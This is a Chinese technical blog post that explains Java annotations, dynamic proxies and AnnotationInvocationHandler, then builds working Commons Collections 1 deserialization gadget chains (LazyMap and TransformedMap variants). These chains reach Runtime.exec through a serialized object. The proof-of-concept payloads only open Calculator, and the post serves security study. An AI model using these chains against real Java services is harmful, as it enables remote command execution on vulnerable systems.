JF3—注解、动态代理与CC1

注解

Java使用@interface来定义注解,假设要自定义一个名为@Range的注解如下

@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.FIELD)
public @interface Range {
    int min() default 0;
    int max() default 255;
}

在某个JavaBean应用@Range

public class Price {
    @Range(min=1, max=20)
    public String value;
}

但是此时这个注解对程序本身没有任何影响,一般我们设定@Range是希望字段值能符合范围要求,那么这段代码需要我们自己编写

void check(Price price) throws IllegalArgumentException, ReflectiveOperationException {
    for (Field field : price.getClass().getFields()) { // 遍历所有Field
        Range range = field.getAnnotation(Range.class); // 获取Field定义的@Range
        if (range != null) { // 如果该字段被@Range标记
            Object value = field.get(price); // 获取Field的值
            if (value instanceof String) { // 如果是String类型
                String s = (String) value;
                if (s.length() < range.min() || s.length() > range.max()) { // 判断值是否满足@Range的min/max
                    throw new IllegalArgumentException("Invalid field: " + field.getName());
                }
            }
        }
    }
}

注解中有一个重要的概念叫做元注解,它可以修饰其他注解,如@Target@Retention@Repeatable@Inherited等。上面的Demo中用到了前两个。后两个注解应用相对较少,@Repeatable定义注解是否可重复,@Inherited定义子类是否可继承父类定义的注解。

(1)@Target:定义这个注解可以应用在源码的哪些位置,根据源码的位置标记如下

类或接口:ElementType.TYPE;
字段:ElementType.FIELD;
方法:ElementType.METHOD;
构造方法:ElementType.CONSTRUCTOR;
方法参数:ElementType.PARAMETER。

假设要将注解@Report定义在方法或字段上,标记如下

@Target({
    ElementType.METHOD,
    ElementType.FIELD
})
public @interface Report {
    ...
}

(2)@Retention:定义注解的生命周期。分为:仅编译期RetentionPolicy.SOURCE、仅class文件RetentionPolicy.CLASS、运行期RetentionPolicy.RUNTIME。如果没有标注,则默认为.CLASS。但是一般自定义的注解都采用.RUNTIME

动态代理

Interface类型的变量是需要向上转型来创建实例的。如果想要不编写实现类直接new一个Interface就需要用到动态代理。假设接口类为Echo,类中有个call方法,其动态实现如下

InvocationHandler handler = new InvocationHandler() {
    @Override
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        ...
    }
};

Echo echo = (Echo) Proxy.newProxyInstance(
    Echo.class.getClassLoader(), // 传入ClassLoader
    new Class[] { Echo.class }, // 传入要实现的接口
    handler); // 传入处理调用方法的InvocationHandler
echo.call("axisx");

所有的注解都继承自java.lang.annotation.Annotation,读取注解需要用反射,如下:

Range range=xx.class.getAnnotation(Range.class); // range的类型为$Proxy
System.out.println(range.min()); 

如果在range上打个断点,在调试过程中会执行到AnnotationParser.annotationForMap(),代码如下,完全符合上述动态代理的过程,最终得到的range也是$Proxy类型的。

    public static Annotation annotationForMap(final Class<? extends Annotation> var0, final Map<String, Object> var1) {
        return (Annotation)AccessController.doPrivileged(new PrivilegedAction<Annotation>() {
            public Annotation run() {
                return (Annotation)Proxy.newProxyInstance(var0.getClassLoader(), new Class[]{var0}, new AnnotationInvocationHandler(var0, var1));
            }
        });
    }

此时用到的InvocationHandler类型为AnnotationInvocationHandler

AnnotationInvocationHandler

Range注解Demo执行到此处时,其构造函数的var1为Range注解类,var2为@Range赋值的键值对{"max":"20", "min":"1"}

另外,一般自定义注解类上都标注了@Retention(RetentionPolicy.RUNTIME),在这种情况下,构造函数的var1为Retention类,var2为@Retention的键值对{"value": {RetentionPolicy@532} }

    AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
        Class[] var3 = var1.getInterfaces();
        if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
            this.type = var1;
            this.memberValues = var2;
        } ...
    }

InvocationHandler接口本身只有一个invoke方法,用于实现接口的具体功能。AnnotationInvocationHandler是基于注解对invoke进行实现的,上面提到所有的注解都继承自Annotation接口,Annotation接口中一共四个方法:equals()、hashCode()、toString()、annotationType()。所以对method名称的判断就包括这四种,如果名称不在这四个范围内,就以名称为key,从memberValues属性中获取对应的值。

public Object invoke(Object var1, Method var2, Object[] var3) {
        String var4 = var2.getName();
        Class[] var5 = var2.getParameterTypes();
        if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
            return this.equalsImpl(var3[0]);
        } else if (var5.length != 0) { // 要求var2为无参方法
            throw new AssertionError("Too many parameters for an annotation method");
        } else {
            switch (var4) {
                case "toString":
                    return this.toStringImpl();
                case "hashCode":
                    return this.hashCodeImpl();
                case "annotationType":
                    return this.type;
                default:
                    Object var6 = this.memberValues.get(var4);
                   ...
            }
        }
    }

CC1 LazyMap

上面AnnotationInvocationHandler.invoke(),调用了memberValues.get()方法。而memberValues是Map类型的,可以构造对LazyMap的调用。前一篇JF2中讲到Tranformer形成了命令执行的链条,后续的链条就是由LazyMap.get()进行调用,CC1和CC6的后续是一致的。那么此时的问题就是如何调用AnnotationInvocationHandler.invoke()

private final Map<String, Object> memberValues;

前面提到动态代理调用接口方法时,可以自动执行invoke。那么payload整体构造思路就是:(1)创建Transformer链条,赋值给LazyMap(2)反射创建一个InvocationHandler,构造函数的Map参数,即memberValues,赋值为LazyMap(3)构造函数的Map参数赋值为动态代理(这样在readObject()时,Map(Proxy).entrySet()会调用到AnnotationInvocationHandler.invoke()

        Transformer[] transformer=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[] {"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[] {null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[] {"open /System/Applications/Calculator.app"})
        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformer);
        Map hashMap=new HashMap();
        Map map= LazyMap.decorate(hashMap,chainedTransformer);

        Class cls=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor=cls.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        InvocationHandler InvocationHandler=(InvocationHandler)constructor.newInstance(Retention.class,map);

        Map proxyMap=(Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},InvocationHandler);
        InvocationHandler=(InvocationHandler)constructor.newInstance(Retention.class,proxyMap);

        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
        outputStream.writeObject(InvocationHandler);
        outputStream.close();

        ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));
        inputStream.readObject();

CC1 TransformedMap

另外针对AnnotationInvocationHandler还有一个链条思路,就是不走invoke,而是直接从readObject方法入手。

这里有个前置条件,CC1和CC6对于Transformer链条的衔接都用的是LazyMap,但是这个<8u71的用的是TransformedMap。二者的作用都是调用了Transformer.transform()

# LazyMap
    public Object get(Object key) {
        // create value for key if key is not currently in the map
        if (map.containsKey(key) == false) {
            Object value = factory.transform(key);
            map.put(key, value);
            return value;
        }
        return map.get(key);
    }
# TransformedMap
    public Object put(Object key, Object value) {
        key = transformKey(key);
        value = transformValue(value); // return keyTransformer.transform(object);
        return getMap().put(key, value); // valueTransformer.transform(object);
    }

但是二者对于上层的调用构造是有区别的,TransformedMap只需要构造一个map.put("xx","xx")即可触发,

AnnotationInvocationHandler.readObject()代码如下,假设上面的range实例进行反序列化,var3获取的就是Range类的属性和类型,即{"min":Integer.class,"max":Integer.class},然后对这个Map结构进行遍历

    private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
        var1.defaultReadObject();
        AnnotationType var2 = AnnotationType.getInstance(this.type);

        Map var3 = var2.memberTypes();
        Iterator var4 = this.memberValues.entrySet().iterator();

        while(var4.hasNext()) {
            Map.Entry var5 = (Map.Entry)var4.next();
            String var6 = (String)var5.getKey(); // Map的key,如range的min属性
            Class var7 = (Class)var3.get(var6); // 获取min属性的类型,Integer.class
            if (var7 != null) {
                Object var8 = var5.getValue(); // 获取min的属性值,1
                if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                }
            }
        }
    }

其中var5.setValue()就是往Map里写入值,实际上调用的就是map.put()。在执行到这步之前有个判断,var7!=null,也就是在注解类中必须存在var6这个key,key就是注解中定义的方法。那么我们就需要找到一个JDK自带的通用的注解类,元注解就符合这个思路。假如选取元注解中的@Retention,它有一个自带的方法value()

public @interface Retention {
    RetentionPolicy value();
}

整体payload如下,同理其中的Retention.class可以换成Target.class等元注解类

        Transformer[] transformer=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[] {"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[] {null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[] {"open /System/Applications/Calculator.app"})
        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformer);
        Map hashMap=new HashMap();
        hashMap.put("value","axisx");

        Map map=TransformedMap.decorate(hashMap,null,chainedTransformer);

        Class cls=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor=cls.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        InvocationHandler InvocationHandler=(InvocationHandler)constructor.newInstance(Retention.class,map);

        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
        outputStream.writeObject(InvocationHandler);
        outputStream.close();

        ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));
        inputStream.readObject();

但是CC1存在一个限制,只适用于Java 8u71以下版本,因为在此之后AnnotationInvocationHandler#readObject的逻辑发生了变化

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,837评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,551评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,417评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,448评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,524评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,554评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,569评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,316评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,766评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,077评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,240评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,912评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,560评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,176评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,425评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,114评论 2 366
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,114评论 2 352

推荐阅读更多精彩内容